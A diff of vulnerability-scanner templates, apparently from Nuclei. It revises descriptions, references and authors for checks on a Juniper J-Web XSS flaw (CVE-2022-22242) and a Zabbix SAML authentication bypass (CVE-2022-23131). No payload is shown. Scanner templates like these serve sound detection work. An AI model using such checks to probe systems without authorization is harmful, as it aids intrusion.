@ -5,12 +5,12 @@ info:
|
|||
author: EvergreenCartoons
|
||||
severity: medium
|
||||
description: |
|
||||
A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim's browser in the context of their session within J-Web
|
||||
Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
|
||||
reference:
|
||||
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
|
||||
- https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
|
||||
- https://kb.juniper.net/JSA69899
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -43,3 +43,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/13
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2022-23131
|
|||
|
||||
info:
|
||||
name: Zabbix - SAML SSO Authentication Bypass
|
||||
author: For3stCo1d
|
||||
author: For3stCo1d,spac3wh1te
|
||||
severity: critical
|
||||
description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
|
||||
reference:
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue